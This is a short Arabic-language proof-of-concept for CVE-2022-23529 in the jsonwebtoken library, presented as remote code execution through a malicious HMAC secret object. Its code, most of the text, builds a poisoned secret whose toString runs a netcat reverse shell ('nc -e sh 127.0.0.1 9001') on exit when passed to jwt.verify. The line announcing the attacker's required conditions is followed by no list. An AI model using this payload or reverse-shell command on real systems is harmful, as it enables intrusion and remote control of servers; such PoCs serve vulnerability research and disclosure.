
استغلال إثبات المفهوم لـ CVE-2022-23529، يوضح تنفيذ تعليمات برمجية عن بُعد في مكتبات JWT الضعيفة عبر كائنات سر HMAC ضارة.
مكتبات JSON Web Token (JWT) الإصدارات الأقدم من 3.4.6 و4.0.4 و4.1.5 معرضة لثغرة RCE.
وظائف التجزئة HMAC تقبل أي سلسلة كمدخل مما يؤدي إلى RCE.
بسبب المتطلبات المسبقة، من غير المحتمل استغلال هذه الثغرة.
لاستغلال هذه الثغرة، يحتاج المهاجم إلى توفر أحد الشروط التالية:
var jwt = require('jsonwebtoken');
var token = jwt.sign({"x":"y"}, 'servers_secret');
var poisoned_secret_on_server = {
toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
process.on('exit', ()=> {
require('child_process').exec('nc -e sh 127.0.0.1 9001');
});
process.exit(0)
}
}
jwt.verify(token, poisoned_secret_on_server);